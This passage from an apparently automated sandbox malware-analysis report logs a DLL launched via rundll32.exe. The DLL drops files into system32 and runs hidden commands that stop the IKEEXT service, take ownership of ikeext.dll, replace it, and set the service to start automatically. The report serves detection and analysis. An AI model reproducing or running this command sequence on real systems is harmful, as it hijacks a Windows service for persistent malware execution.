private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #6: rundll32.exe

(Host: 71, Network: 0)

Information	Value
ID	#6
File Name	c:\windows\system32\rundll32.exe
Command Line	"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28

OS Process Information

Information	Value
PID	0xb74
Parent PID	0xb54 (c:\windows\system32\dllhost.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B78

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
rundll32.exe.mui	0x000d0000	0x000d0fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000100000	0x00100000	0x00100fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000150000	0x00150000	0x00217fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000370000	0x00370000	0x00470fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000490000	0x00490000	0x0049ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000530000	0x00530000	0x0056ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000570000	0x00570000	0x0064efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000720000	0x00720000	0x0075ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rundll32.exe	0x008e0000	0x008edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000008f0000	0x008f0000	0x014effff	Pagefile Backed Memory	Readable	Region Actions
tempdebug.dll	0x5ef10000	0x5ef95fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x736e0000	0x736f2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x739d0000	0x73a0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x758a0000	0x764e9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76b40000	0x76b96fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imagehlp.dll	0x76c30000	0x76c59fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Created Files

Filename	File Size	Hash Values	Actions
c:\windows\system32\sensr9.dat	4.00 KB (4096 bytes)	MD5: 422a9797a40f1b1c3a72e9674adffedb SHA1: 92e351c5e1cc5abc36fb003b435acbc018253f56 SHA256: e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac	File Actions Show Properties Download
c:\windows\system32\sensr3.dat	97.43 KB (99767 bytes)	MD5: 6317421e5b20c3df65bf66b4ec472187 SHA1: c6ed48d2daf396178b1840a1877532c429d85cd0 SHA256: 2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1	File Actions Show Properties Download
c:\windows\system32\ikeext.dll	132.50 KB (135680 bytes)	MD5: c3217cf9789f2b7a41f8ce54692d18fd SHA1: f5bc9b2373201b214b3d0d248c95716023bc0c14 SHA256: f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de	File Actions Show Properties Download
c:\windows\system32\ikeext32.dll	658.50 KB (674304 bytes)	MD5: f95622f161474511b8d80d6b093aa610 SHA1: 691848e306566c63f5dfe1edcca7c7e8882c4caa SHA256: f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26	File Actions Show Properties Download

Threads

Thread 0xb78

(Host: 65, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765e3879	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x765e418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x765e76e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765e3879	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x765e418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x765e1e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x765e76e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7661f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Load	module_name = Shlwapi, base_address = 0x76b40000	1	Fn
Module	Load	module_name = Shell32, base_address = 0x758a0000	1	Fn
Module	Load	module_name = Advapi32, base_address = 0x764f0000	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
File	Create	filename = C:\Windows\system32\sensr9.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = C:\Windows\system32\sensr9.dat, size = 4096	1	Fn Data
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "net stop /y ikeext", os_pid = 0xb7c, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll", os_pid = 0xba0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F", os_pid = 0xbc0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F", os_pid = 0xbe0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Move	source_filename = C:\Windows\system32\ikeext.dll, destination_filename = C:\Windows\system32\ikeext32.dll	1	Fn
File	Delete	filename = C:\Windows\system32\ikeext.dll	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Delete	filename = C:\Windows\system32\sensr3.dat	1	Fn
File	Create	filename = C:\Windows\system32\sensr3.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = C:\Windows\system32\sensr3.dat, size = 99767	1	Fn Data
File	Delete	filename = C:\Windows\system32\ikeext.dll	1	Fn
File	Create	filename = C:\Windows\system32\ikeext.dll, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = C:\Windows\system32\ikeext.dll, size = 135680	1	Fn Data
File	Create	filename = C:\Windows\system32\kernel32.dll, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Windows\system32\kernel32.dll, type = time	1	Fn
File	Create	filename = C:\Windows\system32\sensr3.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Create	filename = C:\Windows\system32\kernel32.dll, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Windows\system32\kernel32.dll, type = time	1	Fn
File	Create	filename = C:\Windows\system32\ikeext.dll, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Create	filename = C:\Windows\system32\kernel32.dll, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Windows\system32\kernel32.dll, type = time	1	Fn
File	Create	filename = C:\Windows\system32\sensr9.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto", os_pid = 0xc00, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe /c "net start ikeext", os_pid = 0xc20, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x765e1f61	2	Fn

Process #7: cmd.exe

(Host: 58, Network: 0)

Information	Value
ID	#7
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "net stop /y ikeext"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28

OS Process Information

Information	Value
PID	0xb7c
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B80

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000420000	0x00420000	0x004e7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005c0000	0x005c0000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000005d0000	0x005d0000	0x006d0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006e0000	0x006e0000	0x012dffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000012e0000	0x012e0000	0x01442fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01450000	0x0171efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xb80

(Host: 53, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 80465	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\net.exe, os_pid = 0xb90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #8: net.exe

Information	Value
ID	#8
File Name	c:\windows\system32\net.exe
Command Line	net stop /y ikeext
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xb90
Parent PID	0xb7c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B94

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000150000	0x00150000	0x0015ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000190000	0x00190000	0x0020ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	Readable, Writable	Region Actions Download Dump
net.exe	0x00df0000	0x00e07fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
browcli.dll	0x6d0f0000	0x6d0fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x71dd0000	0x71de1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samcli.dll	0x734e0000	0x734eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
